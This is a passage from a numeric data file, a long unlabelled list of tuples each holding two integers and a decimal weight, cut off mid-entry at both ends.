16669),(103,16116,0.32669),(103,16117,1.00331),(103,16118,1.14331),(103,16119,0.98),(103,16120,1.05),(103,16121,1.12014),(103,16122,0.88669),(103,16123,0.98),(103,16124,0.91),(103,16125,1.00331),(103,16126,1.77338),(103,16127,1.02669),(103,16128,1.00331),(103,16129,0.88669),(103,16130,1.05),(103,16131,0.86331),(103,16132,1.02669),(103,16133,1.00331),(114,16133,1.00331),(121,16133,1.00331),(111,16133,2.00662),(103,16134,1.12),(103,16135,0.91),(103,16136,1.07331),(103,16137,0.84),(110,16137,0.84),(103,16138,0.95669),(103,16139,1.07331),(103,16140,1.16669),(103,16141,0.88669),(103,16142,0.95669),(103,16143,1.02669),(103,16144,1.09669),(103,16145,0.86331),(103,16146,1.05),(103,16147,0.91),(103,16148,1.00331),(103,16149,1.09669),(103,16150,0.86331),(103,16151,0.95669),(103,16152,0.86331),(103,16153,0.93331),(103,16154,0.81669),(120,16154,0.81669),(126,16154,0.81669),(103,16155,0.98),(103,16156,0.95669),(103,16157,1.02669),(103,16158,1.72662),(103,16159,1.96),(103,16160,0.23331),(120,16160,0.23331),(103,16161,0.91),(103,16162,1.19),(103,16163,0.28),(103,16164,0.88669),(103,16165,1.05),(103,16166,0.86331),(103,16167,1.00331),(103,16168,0.28),(103,16169,0.95669),(103,16170,1.33),(103,16171,0.95669),(103,16172,0.32669),(103,16173,1.02669),(103,16174,1.14331),(103,17497,0.28),(109,17497,0.28),(103,17498,0.93331),(103,17499,1.05),(103,17500,0.28),(103,17501,0.95669),(103,17502,1.12),(103,17503,0.28),(103,17504,0.91),(103,17505,1.02669),(103,17506,0.42),(103,17507,1.00331),(103,17508,1.12),(103,17509,0.32669),(103,17510,0.98),(103,17511,1.07331),(103,17512,0.88669),(103,17513,1.02669),(103,17514,1.00331),(103,17515,1.14331),(103,17516,0.91),(103,17517,1.02669),(103,17518,1.05),(103,17519,1.21331),(103,17520,0.91),(103,17521,1.00331),(103,17522,0.95669),(103,17523,1.09669),(103,17524,1.05),(103,17525,1.16669),(103,17526,0.28),(103,17527,0.91),(103,17528,1.00331),(103,17529,0.46669),(103,17530,1.05),(103,17531,1.16669),(112,17532,0.14),(117,17532,0.14),(118,17532,0.14),(103,17532,0.28),(107,17532,0.98),(103,17533,0.84),(103,17534,0.95669),(103,17535,0.88669),(103,17536,0.98),(103,17537,0.18669),(116,17537,0.18669),(118,17537,0.18669),(125,17537,0.18669),(103,17538,0.86331),(103,17539,0.93331),(103,17540,0.23331),(104,17540,0.23331),(103,17541,1.05),(103,17542,1.16669),(103,17543,0.18669),(103,17544,1.07331),(103,17545,1.23669),(103,17546,0.23331),(103,17547,1.02669),(103,17548,1.12),(103,17549,0.23331),(103,17550,0.95669),(103,17551,1.12),(104,17552,0.035),(107,17552,0.035),(120,17552,0.035),(123,17552,0.035),(103,17552,0.105),(103,17553,0.91),(103,17554,0.95669),(103,17555,0.95669),(103,17556,1.07331),(103,17557,0.95669),(103,17558,1.05),(103,17559,0.18669),(105,17559,0.18669),(116,17559,0.18669),(107,17559,0.37338),(112,17559,0.37338),(103,17560,0.88669),(107,17560,0.88669),(116,17560,0.88669),(103,17561,0.98),(103,17562,0.23331),(103,17563,0.93331),(103,17564,1.02669),(103,17565,0.32669),(110,17565,0.32669),(103,17566,0.93331),(103,17567,1.02669),(103,17568,0.23331),(109,17568,0.23331),(103,17569,0.95669),(103,17570,1.05),(103,17571,0.7),(103,17572,1.14331),(103,17573,1.23669),(103,17574,0.32669),(103,17575,0.95669),(103,17576,1.07331),(103,17577,0.28),(103,17578,1.00331),(103,17579,1.12),(103,17580,0.91),(103,17581,1.05),(103,17582,1.72662),(103,17583,1.02669),(103,17584,0.95669),(103,17585,0.93331),(103,17586,1.02669),(103,17587,0.98),(103,17588,1.12),(105,17589,0.02331),(116,17589,0.02331),(120,17589,0.02331),(107,17589,0.04662),(117,17589,0.06993),(103,17589,0.11655),(113,17589,0.11655),(103,17590,0.91),(103,17591,1.00331),(103,17592,1.07331),(103,17593,1.16669),(103,17594,1.00331),(103,17595,1.19),(103,17596,0.93331),(103,17597,1.09669),(103,17598,0.95669),(103,17599,1.07331),(103,17600,0.42),(112,17600,0.42),(113,17600,0.84),(116,17600,0.84),(103,17601,1.09669),(103,17602,1.16669),(103,17603,0.23331),(134,17603,0.23331),(103,17604,1.00331),(103,17605,1.07331),(103,17606,0.32669),(103,17607,0.93331),(103,17608,1.05),(103,17609,0.23331),(111,17609,0.23331),(103,17610,0.88669),(103,17611,1.00331),(103,17612,0.23331),(103,17613,0.88669),(103,17614,0.98),(103,17615,0.23331),(103,17616,0.98),(103,17617,1.16669),(103,17618,0.37331),(103,17619,0.95669),(103,17620,1.07331),(103,17621,0.23331),(103,17622,0.91),(103,17623,0.98),(103,17624,0.28),(103,17625,0.95669),(103,17626,1.05),(105,17627,0.23331),(110,17627,0.23331),(119,17627,0.23331),(103,17627,0.46662),(125,17627,0.46662),(103,17628,0.88669),(103,17629,0.98),(103,17630,0.88669),(103,17631,1.02669),(103,17632,0.28),(103,17633,0.98),(103,17634,1.12),(103,17635,0.23331),(120,17635,0.23331),(103,17636,0.93331),(120,17636,0.93331),(103,17637,0.98),(119,17638,0.23331),(103,17638,0.93324),(103,17639,0.88669),(103,17640,1.07331),(103,17641,1.91338),(103,17642,1.14331),(103,17643,1.16669),(103,17644,0.91),(103,17645,1.05),(103,17646,0.18669),(105,17646,0.18669),(103,17647,0.88669),(103,17648,1.07331),(103,17649,0.23331),(113,17649,0.23331),(119,17649,0.23331),(128,17649,0.46662),(123,17649,0.69993),(103,17650,1.00331),(103,17651,1.19),(103,17652,0.32669),(103,17653,1.09669),(103,17654,1.21331),(103,17655,0.23331),(117,17655,0.23331),(103,17656,0.98),(103,17657,1.07331),(103,17658,0.37331),(103,17659,1.02669),(103,17660,1.12),(103,17661,0.28),(103,17662,0.91),(103,17663,0.98),(103,17664,0.23331),(103,17665,0.91),(103,17666,1.02669),(103,17667,0.28),(103,17668,0.93331),(103,17669,1.05),(103,17670,0.46669),(103,17671,1.00331),(103,17672,1.05),(103,17673,0.42),(119,17673,0.84),(103,17674,1.02669),(103,17675,1.21331),(103,17676,0.23331),(103,17677,0.88669),(103,17678,0.98),(103,17679,0.37331),(103,17680,1.07331),(103,17681,1.16669),(103,17682,0.95669),(103,17683,1.00331),(103,17684,0.91),(103,17685,1.00331),(104,18269,0.91),(104,18270,1.05),(104,18271,0.95669),(104,18272,1.14331),(104,18273,0.84),(104,18274,0.95669),(104,18275,0.84),(106,18275,0.84),(104,18276,0.91),(104,18277,0.98),(104,18278,1.09669),(104,18279,0.84),(104,18280,0.95669),(104,18281,0.98),(104,18282,1.16669),(104,18283,1.00331),(104,18284,1.28331),(104,18285,0.93331),(104,18286,1.00331),(104,18287,0.88669),(118,18287,0.88669),(128,18287,0.88669),(104,18288,0.98),(104,18289,1.68),(104,18290,2.05338),(104,18291,0.84),(104,18292,0.91),(104,18293,0.46669),(125,18293,0.46669),(104,18294,1.05),(104,18295,1.16669),(110,18296,0.09331),(104,18296,0.18662),(104,18297,0.84),(104,18298,0.95669),(104,18299,0.86331),(104,18300,0.95669),(104,18301,0.37331),(104,18302,1.00331),(104,18303,1.16669),(104,18304,1.02669),(104,18305,0.14),(104,18306,0.93331),(104,18307,1.05),(104,18308,0.14),(109,18308,0.14),(111,18308,0.14),(113,18308,0.14),(128,18308,0.14),(104,18309,0.93331),(104,18310,1.07331),(104,18311,0.93331),(104,18312,1.00331),(104,18313,0.95669),(104,18314,1.14331),(104,18315,1.26),(104,18316,1.02669),(104,18317,1.12),(104,18318,1.02669),(104,18319,1.09669),(104,18320,1.12),(104,18321,1.23669),(104,18322,0.51331),(104,18323,1.16669),(104,18324,1.28331),(104,18325,0.81669),(104,18326,0.93331),(104,18327,0.32669),(104,18328,1.00331),(104,18329,1.12),(104,18330,0.81669),(105,18330,0.81669),(112,18330,0.81669),(117,18330,0.81669),(118,18330,0.81669),(119,18330,1.63338),(120,18330,1.63338),(104,18331,0.93331),(104,18332,0.93331),(104,18333,1.00331),(104,18334,0.84),(104,18335,0.93331),(104,18336,0.93331),(104,18337,1.00331),(104,18338,1.02669),(104,18339,1.14331),(104,18340,0.88669),(104,18341,0.95669),(104,18342,0.91),(104,18343,1.05),(104,18344,0.32669),(110,18344,0.32669),(119,18344,0.32669),(125,18344,0.32669),(104,18345,0.98),(104,18346,1.05),(104,18347,0.95669),(104,18348,1.07331),(104,18349,0.46662),(104,18350,0.88669),(104,18351,0.93331),(104,18352,0.88669),(104,18353,0.93331),(104,18354,0.23331),(104,18355,1.05),(104,18356,1.16669),(104,18357,0.91),(104,18358,1.02669),(104,18359,0.88669),(104,18360,1.05),(104,18361,0.88669),(104,18362,1.12),(104,18363,0.95669),(104,18364,1.02669),(104,18365,0.93331),(104,18366,1.05),(104,18367,0.95669),(104,18993,0.18669),(120,18993,0.18669),(123,18993,0.18669),(104,18994,0.86331),(104,18995,1.09669),(110,18996,0.18669),(112,18996,0.18669),(123,18996,0.18669),(120,18996,0.37338),(125,18996,0.56007),(126,18996,0.56007),(104,18996,0.74676),(119,18996,0.74676),(104,18997,0.86331),(104,18998,1.02669),(104,18999,0.86331),(104,19000,1.05),(104,19001,0.88669),(104,19002,1.14331),(104,19003,0.98),(104,19004,1.09669),(104,19005,0.18669),(105,19005,0.18669),(123,19005,0.18669),(110,19005,0.37338),(104,19006,0.91),(104,19007,1.09669),(104,19008,0.28),(104,19009,0.98),(104,19010,1.19),(104,19011,0.14),(120,19011,0.14),(104,19012,0.86331),(120,19012,0.86331),(104,19013,1.02669),(104,19014,0.18669),(105,19014,0.18669),(117,19014,0.18669),(123,19014,0.18669),(107,19014,0.37338),(112,19014,0.37338),(104,19015,0.86331),(107,19015,1.72662),(104,19016,0.95669),(104,19017,0.28),(112,19017,0.28),(120,19017,0.28),(123,19017,0.28),(126,19017,0.28),(104,19018,0.93331),(104,19019,1.07331),(104,19020,0.93331),(104,19021,1.00331),(104,19022,0.18669),(107,19022,0.74676),(104,19023,1.05),(104,19024,1.12),(104,19025,0.23331),(104,19026,0.93331),(104,19027,1.07331),(104,19028,0.32669),(105,19028,0.32669),(110,19028,0.32669),(104,19029,0.98),(104,19030,1.07331),(104,19031,0.32669),(104,19032,1.00331),(104,19033,1.23669),(104,19034,0.46662),(104,19035,0.88669),(104,19036,0.95669),(104,19037,0.95669),(104,19038,1.07331),(104,19039,0.18669),(104,19040,0.91),(104,19041,1.05),(104,19042,0.95669),(104,19043,1.14331),(104,19044,0.28),(111,19044,0.28),(118,19044,0.28),(125,19044,0.28),(128,19044,0.28),(104,19045,0.93331),(104,19046,0.98),(104,19047,0.93324),(104,19048,0.91),(104,19049,1.02669),(104,19050,0.88669),(104,19051,1.05),(104,19052,0.95669),(104,19053,1.05),(104,19054,0.91),(104,19055,1.07331),(104,19056,0.84),(104,19057,0.95669),(104,19058,1.14331),(104,19059,1.00331),(104,19060,1.07331),(104,19061,0.93331),(104,19062,1.09669),(104,19063,0.37331),(104,19064,0.95669),(104,19065,1.05),(104,19066,0.28),(104,19067,0.91),(104,19068,1.05),(104,19069,0.37331),(104,19070,1.02669),(104,19071,1.28331),(104,19072,0.18669),(104,19073,0.88669),(104,19074,0.98),(104,19075,0.23331),(106,19075,0.23331),(104,19076,0.95669),(104,19077,1.00331),(104,19078,0.28),(104,19079,0.91),(104,19080,1.09669),(104,19081,1.86662),(104,19082,1.07331),(104,19083,1.09669),(104,19084,0.93324),(104,19085,0.93331),(104,19086,1.00331),(104,19087,0.91),(104,19088,0.98),(104,19089,0.93331),(104,19090,1.00331),(104,19091,0.91),(104,19092,1.05),(105,19366,0.86331),(105,19367,0.98),(105,19368,0.88669),(105,19369,0.95669),(105,19370,0.86331),(105,19371,0.93331),(105,19372,0.91),(105,19373,1.00331),(106,19374,0.86331),(116,19374,0.86331),(120,19374,0.86331),(105,19374,1.72662),(105,19375,1.00331),(105,19376,1.00331),(105,19377,0.95669),(105,19378,1.05),(105,19379,0.86331),(105,19380,1.02669),(105,19381,0.81669),(119,19381,0.81669),(105,19382,0.95669),(105,19383,0.88669),(105,19384,1.05),(105,19385,0.91),(105,19386,1.05),(105,19387,0.88669),(105,19388,0.95669),(105,19389,1.05),(105,19390,1.12),(105,19391,0.84),(105,19392,0.91),(105,19393,0.14),(105,19394,1.02669),(105,19395,1.09669),(105,19396,1.00331),(105,19397,0.86331),(107,19397,1.72662),(105,19398,1.05),(105,19399,0.32669),(112,19399,0.32669),(118,19399,0.32669),(105,19400,0.98),(105,19401,1.05),(105,19402,1.14331),(105,19403,1.23669),(105,19404,0.28),(105,19405,1.86662),(105,19406,1.02669),(105,19407,1.07331),(105,19408,0.37331),(120,19408,0.37331),(107,19408,0.74662),(105,19409,1.09669),(105,19410,1.19),(105,19411,0.23331),(112,19411,0.93324),(105,19412,0.91),(105,19413,1.09669),(105,19414,0.28),(105,19415,0.84),(105,19416,0.98),(105,19417,0.88669),(105,19418,1.02669),(105,19419,0.23331),(106,19419,0.23331),(112,19419,0.46662),(125,19419,0.46662),(105,19420,1.00331),(105,19421,1.19),(105,19422,0.23331),(105,19423,0.93331),(105,19424,1.09669),(105,19425,0.60669),(105,19426,1.14331),(105,19427,1.26),(105,19428,0.93331),(105,19429,1.00331),(105,19430,0.84),(105,19431,1.00331),(105,19432,0.84),(105,19433,0.93331),(105,19434,0.95669),(105,19435,0.86331),(105,19436,1.00331),(105,19437,0.95669),(105,19438,1.09669),(105,19439,0.98),(105,19440,1.14331),(105,19441,0.88669),(105,19442,1.05),(105,19443,0.95669),(105,19444,0.91),(105,19445,1.00331),(105,19446,0.95669),(105,19447,0.98),(105,19448,1.19),(105,19449,0.86331),(105,19450,0.93331),(105,19451,0.88669),(105,19452,0.98),(105,19453,0.91),(120,19453,0.91),(105,19454,1.12),(105,19455,0.93331),(105,19456,1.00331),(105,19457,0.88669),(105,19458,1.00331),(105,19459,0.91),(105,19460,1.12),(105,19461,0.88669),(105,19462,0.95669),(105,19463,0.91),(105,19464,1.16669),(105,19465,0.98),(105,19466,0.95669),(105,19467,0.86331),(119,19467,0.86331),(123,19467,1.72662),(105,19468,1.02669),(105,19469,0.32669),(105,19470,1.07331),(105,19471,1.14331),(105,19472,0.14),(105,19473,0.91),(105,19474,1.00331),(105,19475,0.46669),(105,19476,1.02669),(105,19477,1.28331),(105,19478,0.46669),(116,19478,0.46669),(105,19479,1.00331),(116,19479,1.00331),(105,19480,1.19),(105,19481,0.42),(105,19482,1.02669),(105,19483,1.16669),(105,19484,0.56),(105,19485,0.93331),(105,19486,1.02669),(105,19487,0.98),(105,19488,1.07331),(105,19489,0.32669),(105,19490,1.00331),(105,19491,1.09669),(105,19492,1.12),(105,19493,0.95669),(105,19494,1.05),(105,19495,0.95669),(105,19496,0.84),(105,19497,0.95669),(105,19498,0.28),(105,19499,0.98),(105,19500,1.16669),(105,19501,0.37331),(105,19502,1.12),(105,19503,1.23669),(105,19504,0.23331),(105,19505,0.91),(105,19506,1.19),(105,19507,0.46669),(105,19508,1.05),(105,19509,1.21331),(105,19510,0.86331),(105,19511,1.00331),(105,19512,1.00331),(105,19513,1.19),(105,19514,0.84),(112,19514,0.84),(105,19515,0.91),(105,19516,0.91),(105,19517,0.98),(105,19518,0.98),(105,19519,0.93331),(105,19520,0.93331),(105,19521,1.00331),(105,19522,1.16669),(105,19523,0.28),(105,19524,0.95669),(105,19525,1.00331),(105,19526,0.28),(105,19527,1.00331),(105,19528,1.14331),(105,20360,0.79331),(105,20361,0.88669),(105,20362,0.88669),(105,20363,0.28),(105,20364,1.02669),(105,20365,1.21331),(105,20366,0.91),(105,20367,1.02669),(105,20368,0.37331),(105,20369,0.98),(105,20370,1.07331),(105,20371,0.93331),(105,20372,1.02669),(105,20373,0.28),(105,20374,1.02669),(105,20375,1.19),(105,20376,0.28),(112,20376,0.28),(105,20377,1.00331),(105,20378,1.12),(105,20379,0.91),(105,20380,0.95669),(105,20381,1.12),(105,20382,1.21331),(105,20383,0.14),(105,20384,0.86331),(105,20385,0.98),(110,20386,0.0175),(112,20386,0.0175),(120,20386,0.0175),(105,20386,0.035),(123,20386,0.0525),(119,20386,0.07),(105,20387,0.98),(105,20388,1.19),(105,20389,0.93331),(105,20390,1.02669),(105,20391,0.69993),(105,20392,0.93331),(105,20393,1.14331),(105,20394,1.02669),(105,20395,1.14331),(105,20396,0.91),(105,20397,1.05),(105,20398,1.05),(105,20399,1.26),(105,20400,0.28),(112,20400,0.28),(105,20401,0.91),(105,20402,1.23669),(105,20403,0.23331),(110,20403,0.23331),(112,20403,0.23331),(123,20403,0.23331),(107,20403,0.46662),(105,20404,0.93331),(105,20405,1.02669),(105,20406,0.28),(105,20407,1.00331),(105,20408,1.23669),(105,20409,0.32669),(105,20410,0.95669),(105,20411,1.05),(105,20412,0.37331),(105,20413,0.98),(105,20414,1.12),(105,20415,0.37331),(105,20416,0.95669),(105,20417,1.05),(105,20418,0.84),(105,20419,1.02669),(105,20420,0.28),(105,20421,0.91),(105,20422,1.07331),(105,20423,0.93331),(105,20424,1.02669),(105,20425,0.32669),(110,20425,0.32669),(119,20425,0.32669),(105,20426,0.95669),(105,20427,1.00331),(105,20428,0.37331),(105,20429,0.95669),(105,20430,1.12),(105,20431,0.09331),(117,20431,0.09331),(105,20432,0.86331),(105,20433,0.95669),(105,20434,0.23331),(105,20435,0.95669),(105,20436,1.02669),(105,20437,0.18669),(119,20437,0.18669),(112,20437,0.93345),(105,20438,0.86331),(105,20439,0.98),(105,20440,1.05),(105,20441,1.16669),(105,20442,0.28),(107,20442,0.56),(105,20443,0.95669),(105,20444,1.02669),(120,20445,0.18669),(105,20445,0.37338),(105,20446,0.86331),(105,20447,0.95669),(105,20448,0.93331),(105,20449,1.02669),(105,20450,0.98),(105,20451,1.23669),(105,20452,0.28),(105,20453,0.91),(105,20454,1.00331),(105,20455,0.32669),(105,20456,1.05),(105,20457,1.14331),(105,20458,0.91),(105,20459,1.00331),(105,20460,0.28),(125,20460,0.28),(105,20461,0.98),(105,20462,1.14331),(123,20463,0.14),(105,20463,0.42),(105,20464,0.95669),(105,20465,1.07331),(105,20466,0.84),(105,20467,0.93331),(105,20468,0.86331),(105,20469,0.98),(105,20470,0.60669),(105,20471,1.07331),(105,20472,1.14331),(105,20473,0.18669),(110,20473,0.18669),(112,20473,0.18669),(126,20473,0.18669),(116,20473,0.37338),(105,20474,0.88669),(105,20475,0.95669),(106,20778,0.88669),(106,20779,1.09669),(106,20780,1.77338),(106,20781,0.98),(106,20782,1.00331),(106,20783,0.93331),(106,20784,1.00331),(106,20785,0.86331),(106,20786,1.02669),(106,20787,0.98),(106,20788,0.84),(106,20789,0.91),(106,20790,0.91),(106,20791,0.84),(106,20792,0.98),(106,20793,0.91),(106,20794,1.02669),(106,20795,0.95669),(106,20796,1.05),(106,20797,0.86331),(106,20798,1.02669),(106,20799,0.95669),(106,20800,1.19),(106,20801,0.93331),(106,20802,1.02669),(106,20803,1.00331),(106,20804,0.56),(106,20805,1.05),(106,20806,1.09669),(106,20807,0.42),(106,20808,1.05),(106,20809,1.16669),(106,20810,0.42),(110,20810,0.42),(112,20810,0.42),(106,20811,0.98),(110,20811,0.98),(112,20811,0.98),(106,20812,1.09669),(106,20813,0.42),(106,20814,1.09669),(106,20815,1.19),(106,20816,0.37331),(113,20816,0.37331),(110,20816,0.74662),(106,20817,1.12),(106,20818,1.23669),(106,20819,0.88669),(106,20820,1.07331),(106,20821,0.42),(106,20822,1.02669),(106,20823,1.16669),(106,20824,0.86331),(106,20825,1.02669),(106,20826,1.02),(106,20827,0.88669),(110,20827,0.88669),(106,20828,1.07331),(106,20829,0.32669),(112,20829,0.32669),(106,20830,1.09669),(106,20831,1.21331),(106,20832,0.46662),(106,20833,0.95669),(106,20834,1.12),(106,20835,1.07331),(106,20836,1.26),(106,20837,0.91),(106,20838,1.09669),(106,20839,1.07331),(106,20840,1.30669),(106,20841,0.91),(106,20842,1.05),(106,20843,0.86331),(106,20844,0.98),(106,20845,0.91),(106,20846,1.12),(106,20847,1.91338),(106,20848,1.14331),(106,20849,1.00331),(106,20850,1.12),(106,20851,1.07331),(106,20852,1.19),(106,20853,0.98),(106,20854,1.02669),(106,20855,0.95669),(106,20856,1.02669),(106,20857,1.96),(106,20858,1.12),(106,20859,1.12),(106,20860,0.91),(106,20861,1.05),(106,20862,0.84),(112,20862,0.84),(120,20862,0.84),(107,20862,1.68),(106,20863,0.93331),(106,20864,1.07331),(106,20865,1.19),(106,20866,1.86662),(106,20867,1.12),(106,20868,1.05),(106,20869,0.88669),(106,20870,1.00331),(106,20871,0.91),(106,20872,1.12),(106,20873,0.86331),(106,20874,0.98),(106,20875,0.95669),(106,20876,0.98),(106,20877,1.16669),(106,20878,1.02669),(106,20879,1.14331),(106,20880,1.02669),(106,20881,1.14331),(106,20882,0.91),(106,20883,0.98),(106,20884,0.88669),(106,20885,1.02669),(106,20886,0.93331),(106,20887,1.09669),(106,20888,0.91),(106,20889,1.09669),(106,20890,0.91),(106,20891,1.00331),(106,20892,1.00331),(106,20893,0.98),(106,20894,1.12),(106,20895,0.95669),(106,20896,0.91),(125,20896,0.91),(106,20897,1.05),(106,20898,0.95669),(106,20899,0.95669),(106,20900,1.16669),(106,20901,0.37331),(110,20901,0.37331),(106,20902,0.98),(106,20903,1.07331),(106,20904,1.05),(106,20905,1.23669),(106,20906,0.56),(118,20906,1.12),(118,20907,0.95669),(106,20907,1.91338),(106,20908,1.07331),(106,20909,1.07331),(106,20910,0.93331),(106,20911,0.84),(106,20912,0.93331),(106,20913,0.93331),(106,20914,1.12),(106,20915,0.46669),(106,20916,1.02669),(106,20917,1.26),(106,20918,0.37331),(106,20919,0.98),(106,20920,1.09669),(106,21810,0.28),(106,21811,1.02669),(106,21812,1.19),(106,21813,0.93338),(106,21814,1.12),(106,21815,1.26),(106,21816,1.12),(106,21817,1.21331),(106,21818,0.42),(106,21819,1.02669),(106,21820,1.16669),(106,21821,2.56641),(106,21822,0.91),(106,21823,1.00331),(106,21824,0.98),(106,21825,1.07331),(106,21826,1.82),(106,21827,2.1),(106,21828,1.77338),(106,21829,1.09669),(106,21830,1.00331),(106,21831,0.95669),(106,21832,1.05),(106,21833,0.98),(106,21834,1.21331),(106,21835,1.02669),(106,21836,1.12),(106,21837,0.93331),(106,21838,1.00331),(106,21839,0.91),(106,21840,1.09669),(106,21841,0.60669),(106,21842,1.12),(106,21843,1.26),(106,21844,0.65338),(106,21845,1.91338),(106,21846,2.19338),(106,21847,0.18669),(106,21848,0.86331),(106,21849,1.00331),(106,21850,0.23331),(106,21851,0.88669),(106,21852,1.02669),(106,21853,0.65338),(106,21854,0.95669),(106,21855,1.21331),(106,21856,1.00331),(106,21857,1.09669),(106,21858,0.32669),(106,21859,1.00331),(106,21860,1.12),(106,21861,0.32669),(119,21861,0.32669),(106,21862,1.05),(106,21863,1.16669),(106,21864,0.28),(113,21864,0.28),(106,21865,0.91),(113,21865,0.91),(106,21866,0.95669),(113,21866,0.95669),(106,21867,1.02669),(106,21868,1.09669),(106,21869,0.37338),(106,21870,0.98),(106,21871,1.07331),(106,21872,0.93331),(106,21873,1.00331),(106,21874,0.23331),(116,21874,0.23331),(106,21875,1.00331),(106,21876,1.16669),(106,21877,0.23331),(128,21877,0.46662),(113,21877,0.69993),(106,21878,0.93331),(106,21879,1.16669),(106,21880,0.28),(106,21881,1.00331),(106,21882,1.19),(106,21883,0.32669),(110,21883,0.32669),(126,21883,0.32669),(107,21883,0.65338),(106,21884,1.07331),(106,21885,1.30669),(106,21886,0.28),(106,21887,1.00331),(106,21888,1.14331),(106,21889,0.23331),(106,21890,1.00331),(106,21891,1.09669),(106,21892,0.28),(106,21893,0.95669),(106,21894,1.14331),(106,21895,0.23331),(106,21896,0.88669),(106,21897,0.93331),(106,21898,0.60669),(106,21899,1.23669),(106,21900,1.33),(106,21901,0.98),(106,21902,1.09669),(106,21903,0.91),(106,21904,1.05),(106,21905,0.46669),(106,21906,1.05),(106,21907,1.26),(106,21908,0.23331),(106,21909,1.00331),(106,21910,1.16669),(107,22205,1.77338),(107,22206,2.1),(110,22207,0.81669),(117,22207,0.81669),(119,22207,0.81669),(107,22207,1.63338),(107,22208,1.86662),(107,22209,1.96),(107,22210,2.1),(107,22211,1.72662),(107,22212,1.96),(112,22213,0.86331),(107,22213,1.72662),(107,22214,1.91338),(107,22215,2.24),(107,22216,0.46669),(107,22217,1.09669),(107,22218,1.16669),(107,22219,1.91338),(107,22220,2.05338),(107,22221,1.86662),(107,22222,2.19338),(107,22223,0.56),(107,22224,2.00662),(107,22225,2.19338),(107,22226,0.88669),(107,22227,0.95669),(107,22228,0.95669),(107,22229,1.05),(112,22230,0.23331),(113,22230,0.23331),(117,22230,0.23331),(128,22230,0.23331),(107,22230,0.46662),(107,22231,1.05),(107,22232,1.14331),(107,22233,0.93331),(112,22233,0.93331),(113,22233,0.93331),(117,22233,0.93331),(128,22233,0.93331),(107,22234,1.05),(107,22235,0.84),(107,22236,2.00662),(107,22237,2.33338),(107,22238,0.37331),(107,22239,0.95669),(107,22240,1.12),(107,22241,0.28),(107,22242,1.91338),(107,22243,2.05338),(107,22244,0.93338),(107,22245,2.28662),(107,22246,2.66),(107,22247,1.02669),(107,22248,1.19),(107,22249,1.86662),(107,22250,2.28662),(107,22251,3.54676),(107,22252,2.05338),(107,22253,2.00662),(107,22254,0.95669),(107,22255,1.02669),(107,22256,2.1),(107,22257,2.05338),(107,22258,2.19338),(107,22259,0.88669),(107,22260,0.98),(107,22261,2.1),(107,22262,2.47338),(107,22263,1.86662),(107,22264,2.1),(107,22265,1.91338),(107,22266,2.19338),(107,22267,0.60669),(107,22268,1.09669),(107,22269,1.28331),(107,22270,1.72662),(107,22271,0.98),(107,22272,1.05),(107,22273,0.86331),(118,22273,0.86331),(107,22274,1.12),(107,22275,0.88669),(107,22276,0.98),(107,22277,0.86331),(107,22278,0.95669),(107,22279,2.00662),(107,22280,2.33338),(107,22281,0.46662),(119,22281,0.69993),(107,22282,1.96),(107,22283,2.33338),(107,22284,0.28),(116,22284,0.28),(123,22284,0.28),(117,22284,0.56),(107,22285,0.93331),(107,22286,1.12),(107,22287,1.82),(107,22288,2.28662),(107,22289,1.91338),(107,22290,1.86662),(107,22291,2.1),(107,22292,0.74662),(107,22293,2.1),(107,22294,2.38),(107,22295,0.28),(107,22296,0.91),(107,22297,1.00331),(107,22828,0.28),(112,22828,0.28),(107,22829,1.05),(107,22830,1.23669),(107,22831,2.00662),(107,22832,0.28),(107,22833,1.68),(107,22834,1.91338),(107,22835,0.56),(107,22836,0.91),(107,22837,1.02669),(107,22838,1.07331),(107,22839,1.21331),(107,22840,1.91338),(107,22841,1.05),(107,22842,1.07331),(107,22843,0.98),(107,22844,1.07331),(107,22845,3.36),(107,22846,1.02669),(107,22847,1.00331),(107,22848,1.82),(107,22849,1.77338),(107,22850,2.1),(107,22851,1.72662),(107,22852,1.86662),(107,22853,1.77338),(107,22854,2.00662),(116,22855,0.37331),(107,22855,0.74662),(107,22856,1.96),(107,22857,2.14662),(107,22858,0.91),(107,22859,0.98),(107,22860,0.95669),(107,22861,1.02669),(107,22862,1.05),(107,22863,0.74662),(107,22864,2.14662),(107,22865,2.28662),(107,22866,0.65338),(107,22867,1.91338),(107,22868,2.14662),(119,22869,0.23331),(107,22869,0.69993),(107,22870,1.77338),(107,22871,2.14662),(107,22872,1.02669),(107,22873,1.07331),(117,22874,0.23331),(107,22874,0.46662),(107,22875,1.86662),(107,22876,1.02669),(107,22877,1.12),(112,22878,0.91),(123,22878,0.91),(107,22878,1.82),(107,22879,2.05338),(107,22880,0.65338),(107,22881,2.05338),(107,22882,2.38),(107,22883,0.18669),(123,22883,0.37338),(107,22884,0.88669),(107,22885,1.09669),(107,22886,0.32669),(107,22887,0.93331),(107,22888,1.02669),(107,22889,1.91338),(107,22890,2.1),(107,22891,2.1),(107,22892,2.28662),(107,22893,1.02662),(107,22894,2.28662),(107,22895,2.66),(107,22896,0.18669),(107,22897,0.93331),(107,22898,1.02669),(107,22899,1.77338),(107,22900,1.96),(107,22901,2.24),(107,22902,0.98),(107,22903,1.09669),(107,22904,1.05),(107,22905,1.16669),(107,22906,0.98),(107,22907,1.12),(107,22908,1.09669),(107,22909,1.21331),(107,22910,1.91338),(107,22911,2.05338),(107,22912,0.98),(107,22913,1.19),(126,23087,0.81669),(119,23087,1.63338),(123,23091,0.84),(110,23115,0.42),(110,23127,0.14),(125,23127,0.14),(116,23127,0.28),(110,23130,0.28),(116,23130,0.28),(126,23130,0.28),(117,23138,0.28),(126,23162,0.91),(119,23171,0.86331),(110,23171,1.72662),(126,23179,0.035),(117,23937,0.86331),(113,23939,0.23331),(116,23967,0.23331),(117,23967,0.23331),(119,23967,0.46662),(110,23978,0.37338),(111,23981,0.28),(119,23981,0.28),(110,23981,0.56),(110,23982,0.91),(109,23984,0.18669),(128,23984,0.37338),(125,23990,0.86331),(110,23993,0.86331),(113,23993,0.86331),(113,23995,0.84),(113,24001,0.42),(117,24001,0.42),(114,24007,0.46669),(110,24015,0.56007),(109,24373,2.00662),(109,24374,1.07331),(109,24375,1.16669),(109,24376,0.93331),(109,24377,1.00331),(109,24378,0.93331),(109,24379,1.02669),(109,24380,0.93331),(109,24381,1.00331),(109,24382,0.86331),(109,24383,0.95669),(109,24384,0.56),(109,24385,1.72662),(109,24386,1.00331),(109,24387,1.12),(109,24388,0.91),(109,24389,1.16669),(109,24390,1.02669),(109,24391,1.26),(109,24392,0.28),(109,24393,0.88669),(109,24394,1.02669),(109,24395,0.28),(109,24396,0.98),(109,24397,1.09669),(109,24398,2.4),(109,24399,0.09331),(111,24399,